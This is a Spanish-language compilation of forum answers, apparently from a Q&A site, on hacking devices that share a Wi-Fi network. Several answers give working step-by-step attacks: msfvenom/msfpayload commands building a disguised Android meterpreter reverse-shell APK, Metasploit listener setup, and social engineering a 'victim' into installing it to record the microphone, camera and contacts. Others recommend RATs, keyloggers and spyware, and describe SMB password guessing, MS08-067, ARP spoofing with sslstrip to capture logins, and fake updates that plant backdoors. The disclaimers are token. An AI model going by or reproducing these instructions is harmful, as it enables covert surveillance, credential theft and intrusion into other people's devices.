Cómo acceder a un dispositivo en la misma red Wi-Fi sin saber su contraseña (piratear)

Descargo de responsabilidad: piratear otros dispositivos en redes inalámbricas (Wi-Fi) sin permiso explícito por escrito es ilegal, a menos que usted sea el propietario legal de los dispositivos que desea piratear y la red inalámbrica.

Acceder a otro dispositivo a través de piratería ética, no importa si se trata de una red cableada o inalámbrica (es decir, Wi-Fi). Los hacks son completamente iguales.

Dicho esto, hay múltiples formas. Para facilitar este proceso, supongo que está utilizando una computadora, y el “dispositivo” al que desea acceder también es una computadora, que ejecuta una versión muy desactualizada de Windows XP, por ejemplo.

En este caso, si el otro dispositivo no tiene un firewall instalado, puede usar un exploit para MS08-067 dentro de Metasploit, y abrirse camino en 5 minutos. Si el dispositivo está parcheado, puede intentar ataques de adivinación de contraseña contra el puerto SMB (TCP 445) para la cuenta de administrador. Metasploit también tiene un módulo para adivinar contraseñas SMB. En caso de que esto falle, también hay vulnerabilidades del lado del cliente, que generalmente se ejecutan a través de un navegador de Internet.

Los exploits del lado del cliente generalmente apuntan a Java y Flash, ya que la mayoría de los navegadores se actualizan automáticamente en estos días (Chrome y FireFox, por ejemplo). Como Chrome tiene Java deshabilitado hasta donde yo sé, los hackers están recurriendo a Adobe Flash en busca de vulnerabilidades. En este caso, también podría usar Metasploit, ya que tiene una opción de “autoenganche del navegador”, a pesar de que no es tan efectivo como los llamados kits de exploit.

En primer lugar, lo que sea que esté escribiendo es para fines educativos. Cómo lo use no es mi problema, pero piratear es un delito ilegal, así que no intente esto hasta que tenga el permiso para hacerlo.

Para Android

Esto es bastante simple. Todo lo que necesita es metasploit y un poco de habilidades de ingeniería social (ambas presentes en KALI Linux). Lo que haces es abrir una terminal y poner:

msfpayload android / meterpreter / reverse_tcp LHOST = (su dirección IP de LAN) LPORT = 8080 R> /root/Desktop/coolapp.apk

Este comando debería proporcionarle un archivo llamado coolapp.apk en el escritorio. Ahora necesitamos configurar un oyente para que cuando el objetivo abra la aplicación, tengamos pirateado su Android.

Primero abriremos la consola de metasploit escribiendo “msfconsole”

Una vez que la consola de metasploit esté abierta, escribiremos,

usar exploit / multi / handler

Presiona regresar y sigue como lo hago

establecer la carga útil de Android / meterpreter / reverse_tcp

Ahora debería tener la carga útil configurada, ahora configuraremos las conexiones

establecer lhost (su dirección IP de LAN)

Ahora su host local está configurado, pero aún necesitamos configurar el puerto.

establecer lport 8080

Presiona enter, ahora desde aquí usamos un poco de ingeniería social para dar el archivo en el escritorio titulado, coolapp.apk, a alguien que lo abra en su teléfono Android. Una vez que le haya dado a alguien la aplicación y esté a punto de abrirla, regrese a su consola de metasploit y escriba:

explotar

Esto debería abrir una conexión pronto con el teléfono Android objetivo donde puede hacer cosas como grabar su micrófono, tomar una foto en su cámara, mirar sus llamadas, mirar sus contactos y su dirección.

Para ventanas

Escritorio remoto en su computadora

No voy a profundizar en cómo hacer esto, pero es posible que pueda controlar de forma remota su computadora una vez que estén conectados a su red. Dependiendo de cómo lo haga, los sacará de su computadora o puede hacerlo furtivamente en segundo plano. Una vez que ingresa, tiene acceso completo a su computadora, como si estuviera frente a usted. Ahí tienes su computadora como la tuya.

, puede usar WiFI de otro sin conocer la contraseña , pero es incorrecto usar cualquier Wifi sin el permiso del propietario. :-pags

Sin embargo, hay una forma, que puede hacer cualquier laico … Si puede acceder al enrutador durante unos segundos, entonces puede hacer este truco

Este truco utiliza la funcionalidad WPS del enrutador. Puede consultar aquí: Cómo conectarse a WiFi bloqueado sin contraseña [HACK]

Sigue los pasos:

1: Vaya a ” Configuración” en su teléfono inteligente -> “WiFi” -> Vaya a “Más” o “Icono de 3 puntos verticales” y busque la opción “Botón WPS” y simplemente tóquelo.

2: Toque el botón “WPS” en la parte trasera de su enrutador. En unos segundos, ambos dispositivos se emparejarán y su dispositivo se conectará a la red WiFi.

¡¡¡Hecho!!! Estás conectado .. Ahora disfruta 🙂 ¡ Vota mi respuesta!

La mejor manera de acceder a su dispositivo objetivo es molestarlos con RAT con algunos trucos de Ingeniería Social.

Hay una gran cantidad de RAT en el mercado.

es decir, RAT nuclear, njRAT, cometa oscuro.

Yo personalmente prefiero el cometa oscuro.

Incluso puede molestar a esa gente con la ayuda de KEYLOGGER (avanzado con funcionalidad RAT) o SPYWARES.

POR FAVOR NO CORREGIR / HACKEAR A ALGUIEN SI NO TIENE PERMISO PARA HACERLO. HACKEAR ES CRIMEN. SE ÉTICO .. 🙂

Hay toneladas de herramientas disponibles para su uso si desea realizar un descifrado inalámbrico de contraseñas. Pero de una forma u otra, necesitaría recuperar la contraseña del usuario. De lo contrario, el craqueo o la fuerza bruta tomarían una gran cantidad de tiempo, dependiendo de la seguridad de la contraseña.

De todos modos, sugeriría Kali Linux como el mejor sistema operativo para usar para hacks inalámbricos. Una herramienta que se está volviendo bastante popular en estos días es Fluxion . Es una aplicación de código abierto en Github y puede descargarla y configurarla en su sistema. Además, es una herramienta bastante simple de usar.

Una vez que esté dentro de la red, tiene una gran cantidad de oportunidades. Podría oler los paquetes que se transmiten a través de la red. Puede enviar paquetes maliciosos a los usuarios. Todo está integrado en Kali Linux que puedes aprender a usar.
Una de las otras herramientas populares para olfatear paquetes es Wireshark . Esta herramienta permite al usuario monitorear y capturar paquetes que se transmiten a través de la misma red.

Por último, pero no menos importante, esto es solo para fines educativos y no intente usarlo con fines maliciosos. Buena suerte. 🙂

No está exactamente claro con su pregunta … si quiere decir que quiere hackear un dispositivo en una red Wi-Fi cuya clave es desconocida para usted, entonces aquí está …

1. Mejor piratear su Wi-Fi … luego podrá conocer a los clientes conectados a él y ARP falsificarlos … realmente puede conectar a los clientes a alguna red wifi mediante airodump-ng (sin siquiera saber la contraseña de su wifi) … solo para conocer a la víctima … (a quién quieres hackear)
2. Si conoce la contraseña de Wi-Fi o sí, si la ha descifrado, puede probar la suplantación de identidad, el secuestro de sesión, la suplantación de ARP y, lo mejor de todo, “Ettercap” para conocer su movimiento en qué sitio han visitado inicios de sesión y contraseñas (sí, incluso “https”, espere un segundo … ¿qué es realmente? https ?? sí, incluso los sitios https “Facebook” “yahoo” y otros … simplemente puede usar sslstrip y degradar https a http, es decir, redirigir cualquier paquete que venga al puerto 80 a 10000) o simplemente puede falsificar cualquier solicitud de Facebook a su propia página de inicio de sesión falsa.

Supongo que esto es más que suficiente … para la información de cualquier cliente … si no?
Vamos a tener acceso completo a la máquina de su dispositivo
Manh, esto es interesante. Lo que realmente puedes hacer para obtener acceso completo a su dispositivo es
“Cree una actualización falsa para el dispositivo de la víctima a través de la misma red Wi-Fi”
Lo que vas a hacer es crear primero una actualización falsa en el dispositivo de tu víctima y falsificar (dns spoof) la url que usa el programa objetivo para buscar actualizaciones y redirigirla a nuestra máquina … el programa objetivo le dirá a la víctima que hay hay una nueva actualización disponible, y cuando el usuario (víctima) acepte instalar la nueva actualización, obtendremos acceso completo a su dispositivo … en realidad instalaremos una puerta trasera (cualquier puerta trasera) cuando el usuario acepte instalar la actualización … que dar acceso completo a su sistema
1. Cree una puerta trasera (o use alguna como msfpayload, etc.)
2. Escuche las conexiones desde su puerta trasera a través de un puerto específico
3. Falsifique la actualización (usando la herramienta de grado malvado)
4. DNS falsifica a la víctima (es decir, cualquier solicitud de url de actualización del programa a nuestra máquina (ip))
Hecho !!

Ahora tiene acceso COMPLETO (completo) a la máquina o dispositivo de su víctima (como si estuviera actualmente sentado en su sistema) ahora puede navegar a través de todos sus datos personales … ¡eliminar, modificar, cargar, descargar cualquier cosa!

El método más simple para acceder a la información sobre un dispositivo conectado a una red Wi-Fi local es escuchar pasivamente las ondas de radio que emite. Herramientas como Kismet o Kismac facilitan la supervisión y el análisis. Este método no revela al dispositivo de destino que está escuchando. También puede triangular la ubicación del dispositivo por la intensidad de la señal.

El enrutador wifi en sí mismo almacena registros y procesa conexiones, y puede proporcionarle información del dispositivo de destino. Además, él y cualquier firewall con el que esté asociado puede procesar cualquier paquete para el dispositivo que va o viene de Internet.

Uno puede realizar ataques de red activos contra el dispositivo, al igual que en una red cableada.

La interferencia de RF y la suplantación de MAC también se pueden realizar contra la conexión WiFi del dispositivo de destino.

bueno para esto, UNO del método llamativo puede ser el secuestro de sesión .

En informática, el secuestro de sesión , a veces también conocido como secuestro de cookies , es la explotación de una sesión válida de computadora , a veces también llamada clave de sesión , para obtener acceso no autorizado a información o servicios en un sistema informático. Puede ver su contenido a través de la red si no están usando el protocolo https.

Este truco no necesita contraseña, solo captura los paquetes de Ethernet usando cualquier herramienta de captura de paquetes como hurón (kali linux) y luego analízalo con la herramienta de análisis de sesión como ( hámster ). De esta manera no necesitas acceder a su dispositivo y puedes saber muchas cosas .

Otros métodos convencionales pueden ser el envío de cargas útiles, el envenenamiento por arp, la fuerza bruta de contraseñas.

Incluso el ataque de los gemelos malvados puede hacer maravillas.

Usualmente uso Kali Linux para piratear un poco.

En realidad, puede hacer demasiadas cosas en cualquier dispositivo cuando las personas están en la misma red.

Primero tienes que hacer PAYLOAD para el dispositivo .

Pero necesitas el sistema operativo Kali Linux

para hacer PAYLOAD puedes usar el comando msfvenom.

msfvenom -p android / meterpreter / reverse_tcp LHOST = your_ip LPORT = 4444 R> payload.apk

Enviar PAYLOAD al dispositivo víctima.

Instale ese archivo en el teléfono de la víctima.

Ahora abra Metasploit escribiendo el siguiente código en la terminal.

msfconsole

Se abrirá Metasploit ahora escriba debajo del código para hackear de forma remota.

msf> use multi / handler
msf exploit (manejador)> set payload android / meterpreter / reverse_tcp
msf exploit (manejador)> establece LHOST your_ip
msf exploit (manejador)> set LPORT 4444
msf exploit (manejador)> explotar

Ahora ha pirateado el teléfono de la víctima.

Pruebe algunos de los siguientes comandos para piratear:

sysinfo
volcar contactos

para más otro comando simplemente escriba:

ayuda

obtendrá una pérdida de comando que puede usar.

El | HackAR |

Bien, descifrar la contraseña wifi y piratear la computadora en la misma red es algo diferente.

Hablemos de piratear una computadora. Primero descargue la aplicación de utilidad del escáner IP. Escaneará todas las direcciones IP asignadas en la red.

Intente hacer ping, es decir, Ping 192.168.xx a esa IP de la computadora que desea piratear, si responde la mayoría de las veces el firewall de la computadora de la víctima está apagado.

Puede intentar explorar los datos de la víctima ingresando este comando “//192.168.xx/c$”

Si eso no funciona, encuentre la manera de crear una cuenta de usuario afmin en la computadora de la víctima, instale telnet. Se puede hacer de forma remota o enviando un script adjuntando a cualquier archivo.

Es una tarea bastante compleja, especialmente cuando no eres técnico.

La mejor manera es mantener su cerebro abierto para escanear lo que ingresa la víctima y ya está. 🙂

Si está hablando de hackear una contraseña wifi que también es posible usando la utilidad del analizador de paquetes airduck airdump, pero tenga en cuenta que en la actualidad casi todos los dispositivos inalámbricos están usando un cifrado bastante bueno y puede tomar días / semanas / meses romper la contraseña cifrada normal basada sobre la complejidad de la contraseña.

¿Qué quieres decir con acceso ? ¿Qué quieres lograr? ¿Qué tipo de dispositivo es _específicamente_? Si quieres hackear algo, debes saber sobre ese objetivo con gran detalle porque normalmente el método más rápido es usar un exploit conocido. Para averiguar qué exploits conocidos están disponibles, necesita saber mucho sobre el dispositivo, qué fabricante y modelo, qué versión de firmware está ejecutando, qué aplicaciones establecen conexiones enlazadas y si el dispositivo está atento a las conexiones entrantes. Comenzaría escaneando el dispositivo con una herramienta como NMAP (escáner de seguridad gratuito para exploración de red y auditorías de seguridad) para que pueda recopilar algunos de estos detalles. Una vez hecho esto, probablemente pueda tomar una huella digital del dispositivo, especialmente si puede escanear desde la misma red WiFi o Ethernet.

Gracias,

Para obtener más respuestas, sígueme Swetabh Suman

Esto es bastante simple. Todo lo que necesitas es metasploit y un poco de habilidades de ingeniería social. Lo que haces es abrir una terminal y poner:

msfpayload android / meterpreter / reverse_tcp LHOST = (su dirección IP de LAN) LPORT = 8080 R> /root/Desktop/coolapp.apk

Este comando debería proporcionarle un archivo llamado coolapp.apk en el escritorio. Ahora necesitamos configurar un oyente para que cuando el objetivo abra la aplicación, tengamos pirateado su Android.

Primero abriremos la consola de metasploit escribiendo “msfconsole”

Una vez que la consola de metasploit esté abierta, escribiremos,

usar exploit / multi / handler

Presiona regresar y sigue como lo hago

establecer la carga útil de Android / meterpreter / reverse_tcp

Ahora debería tener la carga útil configurada, ahora configuraremos las conexiones

establecer lhost (su dirección IP de LAN)

Ahora su host local está configurado, pero aún necesitamos configurar el puerto.

establecer lport 8080

Presiona enter, ahora desde aquí usamos un poco de ingeniería social para dar el archivo en el escritorio titulado, coolapp.apk, a alguien que lo abra en su teléfono Android. Una vez que le haya dado a alguien la aplicación y esté a punto de abrirla, regrese a su consola de metasploit y escriba:

explotar

Esto debería abrir una conexión pronto con el teléfono Android objetivo donde puede hacer cosas como grabar su micrófono, tomar una foto en su cámara, mirar sus llamadas, mirar sus contactos y su dirección.

Hackear como el anterior es perjudicial para la sociedad. En el pasado, muchas veces solíamos ver a los instaladores de líneas telefónicas subir el poste y conectarse a la red telefónica de un número en particular y usar la red sin autorización, lo que resulta en un aumento de la factura al suscriptor. Estás intentando hacer lo mismo. Pero aquí el acto poco ético está siendo cometido por personas altamente educadas. ¿Estás tratando de hacerlo porque no eres económicamente sano?

La forma en que puede comprometer un dispositivo en una red variará mucho entre los diferentes dispositivos, ya que ningún dispositivo es el mismo. Será necesario hackear un iPhone con el usuario ssh predeterminado y pasarlo suponiendo que el teléfono esté liberado. Si hay una computadora que usa una versión desactualizada de Windows XP, podría usar el exploit MS08–067, o si es una Mac, tendrá que descubrir algo más. Todo depende del dispositivo diferente, por lo que no hay una respuesta directa.

Hay una gran cantidad de softwares disponibles … pruebe WPA wps tester … es realmente un probador, pero también puede usarse para conectarse ilegalmente … siempre y cuando el usuario tenga ambos valores encendidos.

Hola, solo puede acceder a través de la misma red a otra PC si tienen unidades compartidas encendidas con otro host simplemente ejecutando un escaneo interno con cualquier herramienta de IP, encontrará el host disponible + sus unidades compartidas y luego a través de cmd

Ejemplo-1: C: \> uso neto D: \\ 128.100.1.16 \ F
Ejemplo-2: C: \> uso neto G: \\ 128.100.1.16 \ SharedDocs
Ejemplo 3: C: \> uso neto I: \\ 128.100.1.16 \ Myprint

buscar netbios hacking amigo! y estas cosas son viejas ahora lo usé primero en la décima clase! se usaba en los viejos tiempos cuando la red de acceso telefónico era popular, pero era algo importante para aquellos tipos como #kevinmitnick #upvote

Ahora que Apple lanzó iOS 10.3.1, iOS está fuera de esa lista. Dudo que puedas hackear Android. Windows se actualiza todo el tiempo. Además, no me gustan las personas que quieren hackear dispositivos para otros fines que no sean buenos, especialmente si ese dispositivo no es suyo. No piratee a menos que tenga una buena razón para hacerlo. Puede llevarte a la cárcel.

Daniel Allen

Si usted y el dispositivo que desea piratear están en la misma red, entonces es posible piratear ese dispositivo. Pero aquí están las cosas que debes hacer antes de hackear ese dispositivo.

Cualquiera que sea el dispositivo, debe responder a las solicitudes que le envíe. Como si desea descargar fotos desde el teléfono celular (lo que supone que hackeó). Para hacerlo, deberá crear una aplicación o software (de acuerdo con el sistema operativo). que deberá instalar en el dispositivo de la víctima.

pero como dijiste no tienes contraseña, así que esto no va a funcionar. Entonces, amigo mío, si no tienes la contraseña de la víctima, no puedes hackear su dispositivo hasta que instale el software que recibe tu comando.

Si tiene permiso yy para aprender, puede probar kali linux y metasploit.

Pruebas de penetración y piratería ética Distribución de Linux

Software de prueba de penetración, seguridad de prueba de pluma | Metasploit

Aquí hay un tutorial sobre cómo instalar Kali en una máquina virtual:

Cómo instalar la versión Kali Linux 2016.2 en VirtualBox

También hay cursos para aprender:

Conviértete en un hacker ético

Este problema del canal de YouTube ayudaría: https://www.youtube.com/user/Hak

La siguiente información es solo para fines educativos.

En Android puedes descargar la aplicación desde Play Store:

  1. WPA WPS TESTER
  2. WPS CONNECT
  3. BUGTROID

Es mejor rootear tu teléfono.

Buena suerte